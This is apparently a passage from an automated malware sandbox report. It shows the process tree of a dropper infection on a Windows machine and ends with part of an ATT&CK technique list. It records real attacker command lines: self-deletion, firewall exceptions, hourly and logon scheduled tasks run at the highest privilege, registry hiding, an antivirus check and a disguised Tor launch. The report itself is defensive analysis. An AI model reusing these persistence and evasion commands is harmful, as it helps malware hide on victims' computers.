- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:952

C:\Windows\SysWOW64\PING.EXE
ping localhost -n 5
6⤵
- Runs ping.exe
PID:1836

C:\Windows\SysWOW64\PING.EXE
ping -n 5 localhost
5⤵
- Runs ping.exe
PID:2188

C:\Users\Admin\Pictures\Adobe Films\xVJiXIH0FM4CqB2OEeytcXZ6.exe
"C:\Users\Admin\Pictures\Adobe Films\xVJiXIH0FM4CqB2OEeytcXZ6.exe"
3⤵
- Executes dropped EXE
PID:580

C:\Users\Admin\Pictures\Adobe Films\c3ItUxuFaaIJd7G8cdcptY4S.exe
"C:\Users\Admin\Pictures\Adobe Films\c3ItUxuFaaIJd7G8cdcptY4S.exe"
3⤵
- Executes dropped EXE
PID:868

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "c3ItUxuFaaIJd7G8cdcptY4S.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\c3ItUxuFaaIJd7G8cdcptY4S.exe" & exit
4⤵
PID:1096

C:\Windows\SysWOW64\taskkill.exe
taskkill /im "c3ItUxuFaaIJd7G8cdcptY4S.exe" /f
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1896

C:\Users\Admin\Pictures\Adobe Films\GhKDsCbn7zPS5pDBpEJ1GNxd.exe
"C:\Users\Admin\Pictures\Adobe Films\GhKDsCbn7zPS5pDBpEJ1GNxd.exe"
3⤵
- Executes dropped EXE
PID:1932

C:\Users\Admin\Pictures\Adobe Films\ngv6jVRLGlmucpE9o_WwkMBD.exe
"C:\Users\Admin\Pictures\Adobe Films\ngv6jVRLGlmucpE9o_WwkMBD.exe"
3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:552

C:\Users\Admin\Pictures\Adobe Films\5ch06654oNHEAMWvsdbULnap.exe
"C:\Users\Admin\Pictures\Adobe Films\5ch06654oNHEAMWvsdbULnap.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:820

C:\Users\Admin\AppData\Local\Temp\is-3C0MK.tmp\5ch06654oNHEAMWvsdbULnap.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3C0MK.tmp\5ch06654oNHEAMWvsdbULnap.tmp" /SL5="$1017C,11860388,791040,C:\Users\Admin\Pictures\Adobe Films\5ch06654oNHEAMWvsdbULnap.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /pid=747
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:1832

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1396

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --installerSessionId=4339b52c1662638243 --downloadDate=2022-09-08T11:56:38 --distId=marketator --pid=747
5⤵
- Executes dropped EXE
- Drops startup file
- Loads dropped DLL
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:1096

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\89536f4e-13c7-43ba-ee07-ad8cff339bae.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\89536f4e-13c7-43ba-ee07-ad8cff339bae.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\89536f4e-13c7-43ba-ee07-ad8cff339bae.run\__sentry-breadcrumb2" --initial-client-data=0x1c4,0x1c8,0x1cc,0x198,0x1d0,0x13f55bc80,0x13f55bca0,0x13f55bcb8
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1652

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
6⤵
- Modifies Windows Firewall
PID:2556

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2652

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
6⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2684

C:\Users\Admin\AppData\Local\Temp\Update-d026a816-0445-42e8-87a1-f07c2d84bece\AdblockInstaller.exe
"C:\Users\Admin\AppData\Local\Temp\Update-d026a816-0445-42e8-87a1-f07c2d84bece\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
6⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3044

C:\Users\Admin\AppData\Local\Temp\is-7GVF4.tmp\AdblockInstaller.tmp
"C:\Users\Admin\AppData\Local\Temp\is-7GVF4.tmp\AdblockInstaller.tmp" /SL5="$401A0,11574525,792064,C:\Users\Admin\AppData\Local\Temp\Update-d026a816-0445-42e8-87a1-f07c2d84bece\AdblockInstaller.exe" /SP- /VERYSILENT /NOICONS /SUPPRESSMSGBOXES /UPDATE
7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:3068

C:\Users\Admin\Programs\Adblock\DnsService.exe
"C:\Users\Admin\Programs\Adblock\DnsService.exe" -remove
8⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:1812

C:\Windows\SysWOW64\ipconfig.exe
"C:\Windows\System32\ipconfig.exe" /flushdns
8⤵
- Gathers network information
PID:2196

C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im Adblock.exe
8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:468

C:\Users\Admin\Programs\Adblock\Adblock.exe
"C:\Users\Admin\Programs\Adblock\Adblock.exe" --update --autorun --installerSessionId=4339b52c1662638273 --downloadDate=2022-09-08T11:57:50 --distId=marketator
8⤵
- Enumerates VirtualBox registry keys
- Executes dropped EXE
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2364

C:\Users\Admin\Programs\Adblock\crashpad_handler.exe
C:\Users\Admin\Programs\Adblock\crashpad_handler.exe --no-rate-limit "--database=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" "--metrics-dir=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps" --url=https://o428832.ingest.sentry.io:443/api/5420194/minidump/?sentry_client=sentry.native/0.4.12&sentry_key=06798e99d7ee416faaf4e01cd2f1faaf "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\dad44652-9635-4949-2196-90002f3fd8b8.run\__sentry-event" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\dad44652-9635-4949-2196-90002f3fd8b8.run\__sentry-breadcrumb1" "--attachment=C:\Users\Admin\AppData\Roaming\Adblock Fast\crashdumps\dad44652-9635-4949-2196-90002f3fd8b8.run\__sentry-breadcrumb2" --initial-client-data=0x1c4,0x1c8,0x1cc,0x198,0x1d0,0x13fdabdd0,0x13fdabdf0,0x13fdabe08
9⤵
- Executes dropped EXE
PID:2368

C:\Windows\system32\netsh.exe
C:\Windows\system32\netsh.exe firewall add allowedprogram "C:\Users\Admin\Programs\Adblock\DnsService.exe" AdBlockFast ENABLE
9⤵
- Modifies Windows Firewall
PID:2688

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -install
9⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2844

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe -start
9⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2832

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
8⤵
PID:2440

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
9⤵
PID:2468

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
8⤵
PID:2472

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
9⤵
- Modifies registry key
PID:2256

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f"
5⤵
PID:1980

C:\Windows\system32\reg.exe
reg copy HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 HKCU\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /s /f
6⤵
PID:892

C:\Windows\system32\cmd.exe
"cmd.exe" /c "reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f"
5⤵
PID:560

C:\Windows\system32\reg.exe
reg delete HKLM\Software\Microsoft\Windows\CurrentVersion\Uninstall\{bf5b0da9-8494-48d2-811b-39ea7a64d8e0}_is1 /f
6⤵
- Modifies registry key
PID:700

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:1836

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
2⤵
- Creates scheduled task(s)
PID:588

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq AvastUI.exe"
1⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1992

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "7108641281699433784-1711753082111986211-1821298061-8716939828280009871266462125"
1⤵
PID:1672

C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20220908115734.log C:\Windows\Logs\CBS\CbsPersist_20220908115734.cab
1⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
PID:1960

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-542348314-1377210077-943789882-1143384900-166173875221209990685855520220185227"
1⤵
PID:1700

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2696

C:\Users\Admin\Programs\Adblock\DnsService.exe
C:\Users\Admin\Programs\Adblock\DnsService.exe
1⤵
- Drops file in Drivers directory
- Executes dropped EXE
PID:2792

C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\tor\Tor\tor.exe" --nt-service -f "C:\Users\Admin\AppData\Local\Temp\csrss\tor\torrc" --Log "notice file C:\Users\Admin\AppData\Local\Temp\csrss\tor\log.txt"
1⤵
- Executes dropped EXE
PID:2212

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

Disabling Security Tools

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry